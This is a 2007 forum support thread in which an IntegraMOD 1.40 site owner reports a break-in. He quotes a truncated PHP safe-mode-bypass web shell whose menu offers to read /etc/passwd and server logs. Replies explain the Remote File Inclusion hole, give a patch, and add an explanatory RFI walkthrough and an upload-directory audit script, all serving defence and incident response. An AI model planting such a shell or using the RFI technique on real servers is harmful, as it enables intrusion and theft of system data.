Someone tried to hack me (v 1.40)

Support for IntegraMOD 140

Moderator: Integra Moderator

PostAuthor: jackflack » Tue Apr 10, 2007 7:43 am

First off, I know that there are more up-to-date versions of IM MOD and phpBB available, so I run this risk knowingly. However, after the last nightmarish forced upgrade of my PHP and SQL I am a little gun-shy about making the upgrade right now. Plus I don't have the time.

On 04/08/07 I noticed some new files being accessed in my IM_MOD_140/files directory. IM_MOD_140 is the root directory for Integra Mod 1.40. The permissions for the files folder were 777. I don't think I changed this and believe it was the default; however, I could be wrong.

This file was uploaded. I will quote the code; if that is improper, have a mod remove it.
[php]<head>
<meta>
</head>
<STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ 
font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style>
<p><b><font>!</font><font><a><span><font>
Dr.RoVeR SaFe Mode SheLL <img> </font></span></a></font><font>!</font></b></p>
<form>
<p><input>
<input></p>
</form>
<form>
<p><select>
<option>Get /etc/passwd</option>
<option>View cpanel logs</option>
<option>Syslog configuration</option>
<option>Hosts</option>
</select> <input></p>
</form>

<?php
/*
Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2
by Dr.RoVeR <H>
*/

echo "<head><title>Safe Mode Shell</title></head>";

$tymczas="./"; // Set $tymczas to dir where you have 777 like /var/tmp

if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = true;
$hsafemode = "<font>ON (secure)</font>";
}
else {$safemode = false; $hsafemode = "<font>OFF (not secure)</font>";}
echo("Safe-mode: $hsafemode");
$v = @ini_get("open_basedir");
if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "<font>".$v."</font>";}
else {$openbasedir = false; $hopenbasedir = "<font>OFF (not secure)</font>";}
echo("<br>");
echo("Open base dir: $hopenbasedir");
echo("<br>");
echo "Disable functions : <b>";
if(''==($df=@ini_get('disable_functions'))){echo "<font>NONE</font></b>";}else{echo "<font>$df</font></b>";}
$free = @diskfreespace($dir);
if (!$free) {$free = 0;}
$all = @disk_total_space($dir);
if (!$all) {$all = 0;}
$used = $all-$free;
$used_percent = @round(100/($all/$free),2);

echo "<PRE>n";
if(empty($file)){
if(empty($_GET['file'])){
if(empty($_POST['file'])){

die(" <FONT>

<big> --------------------------

PostAuthor: ZacFields » Tue Apr 10, 2007 8:09 am

Firstly, I want to point out that 1.4.1 is not vulnerable to this hack. It's called an RFI exploit (Remote File Inclusion) and my site was hit with it a couple weeks ago because I had an archive on my site that was still the old 1.4.0.

I believe the code you need to add to the functions_portal.php is

// Hack Fixes 280806 //
$phpEx = 'php';

if ( !defined('IN_PHPBB') )
{
die("Hacking attempt#27");
}
$phpbb_root_path = './';
// Hack Fixes 280806 //

Add the above code right under all the copyright information (otherwise essentially right after the <?php code). So the first thing you should do is add that code to functions_portal.php, and then also to portal.php in your root if it's not already there.

Unfortunately this will not stop the attacks. This will stop the *successful* attacks but they will probably be running requests to that file for at least a few days until they realize the hole has been patched. This will probably slow down your server a little bit because they will most likely attack from several hundred different IP addresses.

Zac
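As an added illustration (not code from IntegraMOD or from Zac's post), here is the shape of a phpBB-style entry point and helper file with the guard block above in place, and a comment showing the shape it replaces, so each line of the fix can be tied to what it prevents. The file names, the included function file and the `portal_greeting()` helper are assumptions for the example; the two parts are meant to be saved as the two files named in the comments.

```php
<?php
// Added example (not IntegraMOD code): why the "Hack Fixes 280806" block
// closes the Remote File Inclusion hole. File and include names are assumed.

// ===== file: portal.php (assumed entry point) ===============================
// A legitimate entry point defines IN_PHPBB *before* including any helper
// file, and fixes the root path and extension itself. That constant is the
// only signal the helper file's guard can rely on.
define('IN_PHPBB', true);
$phpbb_root_path = './';
$phpEx = 'php';
include($phpbb_root_path . 'includes/functions_portal.' . $phpEx);
echo portal_greeting();

// ===== file: includes/functions_portal.php (helper, hardened shape) =========
// Shape it replaces (1.4.0, per the thread): the helper used the two variables
// without setting them, e.g.
//
//     include($phpbb_root_path . 'includes/functions.' . $phpEx);
//
// Requested directly, no entry point has run, so both variables are unset.
// With register_globals on (still common on shared hosts of that era) a
// request parameter of the same name fills them in, and with URL wrappers
// enabled for include (allow_url_fopen on PHP 4/5.1, allow_url_include on
// 5.2+) the include() fetches and runs code from a location the request
// chose. That is the RFI Zac describes; the fetched code runs as the web
// server user, which is how a shell ends up written into a 777 directory.

$phpEx = 'php';                 // 1. fixed value: the request can no longer pick the extension

if ( !defined('IN_PHPBB') )     // 2. not reached through an entry point: refuse to run at all
{
    die("Hacking attempt#27");
}
$phpbb_root_path = './';        // 3. fixed value: the request can no longer pick the base path

// Every include below now resolves to a local file regardless of the query string.
include($phpbb_root_path . 'includes/functions.' . $phpEx);

function portal_greeting()
{
    return 'portal loaded via ' . basename($_SERVER['SCRIPT_NAME']);
}
```

The ordering matters for the second defence: the guard must sit before any include or function call in the file, which is why Zac says to put it right after the opening `<?php` and the copyright header. The first and third lines are the defence in depth: even on a host where register_globals is on, a request can no longer choose what gets included.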

PostAuthor: jackflack » Tue Apr 10, 2007 8:37 am

ZacFields wrote:

Firstly, I want to point out that 1.4.1 is not vulnerable to this hack. It's called an RFI exploit (Remote File Inclusion) and my site was hit with it a couple weeks ago because I had an archive on my site that was still the old 1.4.0.

I believe the code you need to add to the functions_portal.php is

// Hack Fixes 280806 //
$phpEx = 'php';

if ( !defined('IN_PHPBB') )
{
die("Hacking attempt#27");
}
$phpbb_root_path = './';
// Hack Fixes 280806 //

Add the above code right under all the copyright information (otherwise essentially right after the <?php code). So the first thing you should do is add that code to functions_portal.php, and then also to portal.php in your root if it's not already there.

Unfortunately this will not stop the attacks. This will stop the *successful* attacks but they will probably be running requests to that file for at least a few days until they realize the hole has been patched. This will probably slow down your server a little bit because they will most likely attack from several hundred different IP addresses.

Zac


Thank you, I have applied the patch.

Does IM_MOD_140/files need to be 777, or can it be something a little more secure? That's really my only question left.

PostAuthor: ZacFields » Tue Apr 10, 2007 9:54 am

Your /files directory is where your attachments are all located. It should be at 777, but you could certainly change it. I am not quite sure yet what specific effect it would have if you change it to 666, but I'm certain it would probably disable the ability to use attachments.

If you have applied the patch I gave you then you should be pretty secure from RFI attacks for the time being.

This hack (from the research I've done) is not malicious to the forum itself but rather to the server. All they are doing is using your server's resources to run exploits on other servers, but from what I've seen in researching these exploits they generally are very uninterested in the contents of your website and/or altering them in any way.

Zac
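Jackflack found the shell because new files turned up in the attachments directory, which the thread leaves world-writable. As an added check (not part of IntegraMOD or of either post), the script below walks that directory, lists anything whose name carries a script extension in any dot-segment (so `image.php.jpg` is caught, since Apache's handler matching looks at every segment) and reports whether the directory is world-writable. The default path `./files` and the extension list are assumptions; adjust them to your install.

```php
<?php
// Added example, not IntegraMOD code: audit the attachments directory
// (IM_MOD_140/files in this thread) for files that could execute as PHP.
// Usage from the CLI:  php audit_files.php /path/to/IM_MOD_140/files
// The default path and the extension list are assumptions.

function audit_upload_dir($dir)
{
    // Extensions mod_php installs commonly map to the PHP handler. Apache
    // matches handlers on any dot-segment, so every segment is checked.
    $scriptExt = array('php', 'php3', 'php4', 'php5', 'phtml', 'phps', 'inc');
    $findings  = array();

    $mode = fileperms($dir) & 0777;
    if ($mode & 0002) {
        $findings[] = sprintf('%s is world-writable (mode %04o)', $dir, $mode);
    }

    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $path => $info) {
        if (!$info->isFile()) {
            continue;
        }
        $segments = explode('.', strtolower(basename($path)));
        array_shift($segments);                 // drop the base name, keep extensions
        if (array_intersect($segments, $scriptExt)) {
            $findings[] = sprintf(
                '%s: script extension, modified %s, mode %04o',
                $path,
                date('Y-m-d H:i:s', $info->getMTime()),
                $info->getPerms() & 0777
            );
        }
    }
    return $findings;
}

$dir = isset($argv[1]) ? $argv[1] : './files';
if (!is_dir($dir)) {
    fwrite(STDERR, "not a directory: $dir\n");
    exit(2);
}

$findings = audit_upload_dir($dir);
if (!$findings) {
    echo "no script files found under $dir\n";
    exit(0);
}
echo implode("\n", $findings), "\n";
exit(1);    // non-zero so the check can be scheduled and alert on a hit
```

A hit is a lead, not proof: compare the modification times it prints with the date the unexpected access was noticed, keep a copy of anything found before removing it, and expect the scan to stay useful after the patch, since Zac's point about continued requests to the old file means the directory is worth re-checking for a while.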

